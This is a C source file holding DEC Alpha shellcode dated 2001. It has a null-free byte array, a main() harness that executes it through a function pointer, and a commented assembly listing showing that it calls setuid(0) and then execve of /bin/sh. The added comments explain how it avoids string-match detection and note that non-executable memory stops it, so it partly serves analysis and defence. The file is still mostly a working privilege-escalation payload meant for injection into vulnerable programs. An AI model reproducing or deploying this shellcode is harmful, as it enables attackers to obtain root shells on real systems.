/*
 :
 : setuid(0);
 : execve("/bin/sh", ... );
 :
 : truefinder, seo@igrus.inha.ac.kr
 :
 */

/*
 * code: raw machine-code bytes that main() below runs through a function
 * pointer. Going by the listing name at the end of this file
 * (dec-alpha-set0sh.s) these are DEC Alpha instructions; per the file
 * header they call setuid(0) and then execve("/bin/sh", ...).
 *
 * Layout: 100 bytes, i.e. 25 four-byte instruction words, each stored
 * least-significant byte first. They correspond one-to-one to the
 * assembly listing at the end of this file.
 *
 * Notes for analysis and detection:
 *  - No byte in the array is 0x00, so it survives C string handling.
 *  - The path is built from immediates split across instructions, so the
 *    contiguous text "/bin/sh" does not appear in these bytes; a plain
 *    string match on that path will not flag this array.
 *  - The array is ordinary writable data. It only executes where data
 *    pages are executable; non-executable data/stack policies stop it.
 */
char code[] =
  "\x58\xfe\xde\x23\x0f\x04\xde\x47\x04\x74\xf0\x43\xa4\x01\x8f\xb0"
  "\xa4\x01\x4f\x21\xfb\x6b\x3f\x24\x01\x80\x21\x20\xa8\x01\x2f\xb4"
  "\x10\x04\xff\x47\x80\xf4\xe2\x47\xff\x7f\x4a\x6b\x69\x6e\x3f\x24"
  "\x2f\x62\x21\x20\x73\x68\x5f\x24\xff\x2f\x42\x20\x82\x16\x41\x48"
  "\x90\x01\x2f\xb0\x94\x01\x4f\xb0\x98\x01\xef\xb5\xa0\x01\xef\xb7"
  "\x90\x01\x0f\x22\x98\x01\x2f\x22\x12\x04\xff\x47\x80\x74\xe7\x47"
  "\xff\x7f\xea\x6b";

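/* Function pointer through which the byte array is entered. */
void (*f)();

/*
 * main: minimal harness that transfers control to the bytes in code[].
 *
 * The array is plain writable data, so the call only works where data
 * pages are executable. Under a W^X / non-executable-data policy the call
 * faults instead of running the payload, which is the behaviour a hardened
 * system should show for this file.
 *
 * Returns 0 if the called code ever returns; a successful execve in the
 * payload replaces the process image, so that return is not reached.
 */
int main(void)
{
  /* Explicit cast: converting a data pointer to a function pointer is not
   * an implicit conversion in C, and current compilers reject it (and the
   * implicit-int main) without the cast and the return type. */
  f = (void (*)())code;
  f();
  return 0;
}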

/* ++ dec-alpha-set0sh.s ++

.text
        .globl main
        .ent main
# main: source listing for the bytes in code[] above. Per the file header
# it performs setuid(0) and then execve of /bin/sh.
#
# Register use as visible below: $fp = frame base, $10 = address of a
# two-word stub written into the frame, $0 = call number, $16-$18 =
# call arguments, $31 = the always-zero register.
#
# Defender note: the routine stores instruction words into its own stack
# frame and then jumps to them, so it depends on that memory being
# executable; a non-executable stack stops it at the first jsr.
main:
        subq $sp,424,$sp        # reserve a 424-byte frame
        mov $sp,$fp             # $fp = frame base for every offset below

call_pal_here:
        addq $31,0x83,$4        # $4 = 0x83 ($31 reads as zero)
        stl $4, 420($fp)        # write the word 0x00000083 at frame offset 420
        addq $fp,420,$10        # $10 = address of that word; both jsr below target it
ret_here:
        mov 0x6bfa8001,$1       # word the author's note below identifies as "ret"
        stq $1, 424($fp)        # placed right after the 0x83 word, completing the stub

setuid_here:
        bis $31,$31, $16        # $16 = 0: the uid argument of setuid(0)
        cmoveq $31,0x17,$0      # $0 = 0x17 (condition on $31 always holds); presumably the setuid call number, per the label
        jsr $26,($10),0xffff    # call the stub; return address kept in $26

        mov 0x6e69622f, $1      # bytes 2f 62 69 6e in memory order: "/bin"
        mov 0x68732fff, $2      # "/sh" in the upper three bytes, 0xff filler in the low byte
        srl $2, 0x08, $2        # shift the filler out: 0x0068732f = "/sh" plus a NUL terminator
        stl $1, 400($fp)        # frame+400: "/bin"
        stl $2, 404($fp)        # frame+404: "/sh" and NUL, completing the path string
        stq $fp,408($fp)        # first slot of the pointer array passed as second argument
        stq $31,416($fp)        # zero quadword after it, terminating the array

        lda $16, 400($fp)       # $16 = address of the path string
        lda $17, 408($fp)       # $17 = address of the pointer array
        clr $18                 # $18 = 0 (third argument)


        cmoveq $31,0x3b,$0      # $0 = 0x3b; presumably the execve call number, per the file header
        jsr $31,($10),0xffff    # enter the stub again; $31 as link register discards the return address

        .end main

.ascii "setuid(0); execve("sh",..);"
.ascii "jmp to $10 is 0x00000083, 0x6bfa8001 ( ret )"
.ascii "2001/06/24"
.ascii "truefinder"

-- dec-alpha-set0sh.s -- */
